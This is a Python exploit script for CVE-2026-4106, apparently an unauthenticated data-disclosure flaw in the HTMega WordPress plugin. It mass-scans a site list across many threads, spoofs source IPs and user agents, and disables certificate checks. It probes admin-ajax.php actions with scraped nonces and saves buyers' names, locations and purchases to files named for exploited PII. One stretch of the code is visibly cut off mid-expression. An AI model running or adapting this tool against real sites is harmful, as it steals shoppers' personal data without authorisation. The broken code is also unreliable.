import requests import re import json import random import time import urllib3 import os import ssl import sys import ctypes import signal import threading import html from urllib.parse import urljoin from concurrent.futures import ThreadPoolExecutor, as_completed urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) os.system('') RED = '\033[91m' GREEN = '\033[92m' CYAN = '\033[96m' RESET = '\033[0m' IS_RUNNING = True counter_lock = threading.Lock() file_lock = threading.Lock() def signal_handler(sig, frame): global IS_RUNNING IS_RUNNING = False print(f"\n{RED}[!] Keyboard interrupt received. Exiting immediately...{RESET}") os._exit(1) signal.signal(signal.SIGINT, signal_handler) class SSLAdapter(requests.adapters.HTTPAdapter): def init_poolmanager(self, *args, **kwargs): context = ssl.create_default_context() context.set_ciphers('DEFAULT@SECLEVEL=1') context.check_hostname = False context.verify_mode = ssl.CERT_NONE kwargs['ssl_context'] = context return super(SSLAdapter, self).init_poolmanager(*args, **kwargs) class HTMegaPoC: def __init__(self, thread_count=40): self.json_file = "exploited_PII.json" self.summary_file = "exploited_summary.txt" self.thread_count = thread_count self.processed_count = 0 self.total_sites = 0 self.session = requests.Session() adapter = SSLAdapter() self.session.mount("https://", adapter) self.session.mount("http://", adapter) self.agents = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1" ] def set_title(self, title): if sys.platform == "win32": ctypes.windll.kernel32.SetConsoleTitleW(title) def get_headers(self, target): fake_ip = ".".join(map(str, (random.randint(1, 254) for _ in range(4)))) return { 'User-Agent': random.choice(self.agents), 'X-Requested-With': 'XMLHttpRequest', 'Referer': target + '/', 'X-Forwarded-For': fake_ip, 'Accept': 'application/json, text/javascript, */*; q=0.01' } def scan_target(self, target): global IS_RUNNING if not IS_RUNNING: return target = target.strip() if not target: return if not target.startswith('http'): target = 'https://' + target try: r_main = self.session.get(target, headers=self.get_headers(target), timeout=10, verify=False) with counter_lock: self.processed_count += 1 current_idx = self.processed_count self.set_title(f"CVE-2026-4106 | Scanning: {current_idx}/{self.total_sites}") print(f"[*] [{current_idx}/{self.total_sites}] Checking: {target}") if '/wp-content/' not in r_main.text.lower() or 'htmega' not in r_main.text.lower(): return nonces = list(set(re.findall(r'security\s*[:=]\s*[\'"]([a-f0-9]{10})[\'"]', r_main.text))) ajax_url = urljoin(target, '/wp-admin/admin-ajax.php') actions = [ "wcsales_purchased_products", "htmega_wc_sales_notification_data_load", "htmega_user_list_ajax", "htmega_contact_form_data_load", "htmega_team_member_ajax", "htmega_get_recent_orders_ajax", "htmega_post_grid_ajax", "htmega_portfolio_ajax", "htmega_search_results", "htmega_instagram_feed", "htmega_twitter_feed" ] for action in actions: if not IS_RUNNING: break payloads = [{'action': action, 'limit': '1000'}] for n in nonces: payloads.append({'action': action, 'security': n, 'limit': '1000'}) payloads.append({'action': action, 'nonce': n, 'limit': '1000'}) for data in payloads: if not IS_RUNNING: break r = self.session.post(ajax_url, data=data, headers=self.get_headers(target), timeout=12, verify=False) res_body = r.text.strip() if res_body.lower().startswith(' 0: for item in data[:30]: b = item.get('buyer', {}) name = f"{b.get('fname','')} {b.get('lname','')}".strip() or item.get('display_name', 'UNKNOWN') loc = f"{b.get('city','Unknown')}/{b.get('country','Unknown')}" prod_name = item.get('name', item.get('post_title', 'N/A')) price_raw = str(item.get('price', 'N/A')) price = html.unescape(price_raw) prod_url = item.get('url', 'N/A') f.write(f" -> Buyer: {name} | Location: {loc} | Item: {prod_name} | Price: {price} | URL: {prod_url}\n") else: f.write(f" -> [RAW DATA] {str(data)[:200]}...\n") f.write("\n") except: pass def run(self, sites): self.total_sites = len(sites) print(f"[*] Starting scan on {self.total_sites} targets using {self.thread_count} threads...") with ThreadPoolExecutor(max_workers=self.thread_count) as executor: try: futures = [executor.submit(self.scan_target, site) for site in sites] for future in as_completed(futures): if not IS_RUNNING: break except KeyboardInterrupt: os._exit(1) if __name__ == "__main__": print(f"""{CYAN} =============================================================== [+] Exploit : CVE-2026-4106 [+] Title : HTMega Unauthenticated PII Disclosure Exploit [+] Author : EFETR ==============================================================={RESET} """) print("[1] Single Target\n[2] Mass Scan (sites.txt)") choice = input(f"[{GREEN}?{RESET}] Select mode: ") if choice == "1": target_url = input(f"[{GREEN}?{RESET}] URL: ") scanner = HTMegaPoC(thread_count=1) scanner.run([target_url]) elif choice == "2": threads_input = input(f"[{GREEN}?{RESET}] Threads (default 40): ") threads = int(threads_input) if threads_input.strip() else 40 scanner = HTMegaPoC(thread_count=threads) if os.path.exists("sites.txt"): with open("sites.txt", "r") as f: site_list = [line.strip() for line in f.readlines() if line.strip()] scanner.run(site_list) else: print(f"{RED}[-] Error: sites.txt not found in current directory.{RESET}") else: print(f"{RED}[-] Invalid choice.{RESET}")